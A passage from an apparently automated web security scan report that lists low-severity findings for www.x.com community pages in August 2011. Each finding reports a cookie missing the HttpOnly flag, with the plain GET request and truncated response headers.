
GET /community/ppx/adaptive_accounts HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031383b31342c323036333b31342c323031373b31342c323031363b31342c323030363b31342c323234363b31342c323031353b31342c323031333b31342c323236393b31342c323232313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=100210 t=1313157059307917
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.7. https://www.x.com/community/ppx/adaptive_payments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_payments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/adaptive_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031303b31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=110512 t=1313157031704201
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.8. https://www.x.com/community/ppx/apps101

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/apps101

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/apps101 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033373b31342c323033303b31342c323032383b31342c323032373b31342c323032393b31342c323036333b31342c323032363b31342c323032303b31342c323031383b31342c323031373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=126957 t=1313157062588323
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.9. https://www.x.com/community/ppx/authentication

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/authentication

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/authentication HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=114393 t=1313157031269098
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.10. https://www.x.com/community/ppx/businesspayments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/businesspayments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/businesspayments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134333b31342c323134353b31342c323034373b31342c323030353b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=142422 t=1313157077938365
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.11. https://www.x.com/community/ppx/button_manager

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/button_manager

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/button_manager HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/dev-tools
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:40:03 GMT; Path=/
Vary: User-Agent
JP: D=263918 t=1313156403269344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.12. https://www.x.com/community/ppx/code_samples

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/code_samples

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/code_samples HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032353b31342c323032333b31342c323033343b31342c323036333b31342c323032343b31342c323036343b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=282830 t=1313157065903868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.13. https://www.x.com/community/ppx/dev-tools

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:39:59 GMT; Path=/
Vary: User-Agent
JP: D=80199 t=1313156399568143
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.14. https://www.x.com/community/ppx/dev-tools/decision_tree

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools/decision_tree

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools/decision_tree HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=61135 t=1313157083274538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.15. https://www.x.com/community/ppx/devchallenge

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devchallenge HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:21 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323038363b31342c323134393b31342c323131313b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=53170 t=1313157081752731
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.16. https://www.x.com/community/ppx/devchallenge/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devchallenge/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=56010 t=1313157082994090
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.17. https://www.x.com/community/ppx/developer

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/developer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/developer HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=127401 t=1313157083736368
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.18. https://www.x.com/community/ppx/devtalk

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devtalk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devtalk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131313b31342c323134393b31342c323038323b31342c323131353b31342c323038363b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=227171 t=1313157081321481
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.19. https://www.x.com/community/ppx/devzone

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devzone

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devzone HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133333b31342c323032343b31342c323131343b31342c323033343b31342c323032353b31342c323036333b31342c323032333b31342c323036343b31342c323032323b31342c323033323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=144424 t=1313157066963707
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.20. https://www.x.com/community/ppx/documentation

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/documentation

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/documentation HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323032323b31342c323036343b31342c323036333b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b31342c323032373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=195109 t=1313157064805423
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.21. https://www.x.com/community/ppx/ec

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ec

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/ec HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030383b; Expires=Sun, 11-Sep-2011 01:59:40 GMT; Path=/
Vary: User-Agent
JP: D=109211 t=1313114380657704
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.22. https://www.x.com/community/ppx/feedback

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/feedback

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/feedback HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038363b31342c323038323b31342c323134323b31342c323030353b31342c323134343b31342c323134363b31342c323134333b31342c323134353b31342c323034373b31342c323034363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=75997 t=1313157080027534
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.23. https://www.x.com/community/ppx/fundraising

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/fundraising

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/fundraising HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134353b31342c323134323b31342c323030353b31342c323134333b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=83960 t=1313157078276262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.24. https://www.x.com/community/ppx/global

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=186175 t=1313156344173833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.25. https://www.x.com/community/ppx/global/au

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/au

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/au HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
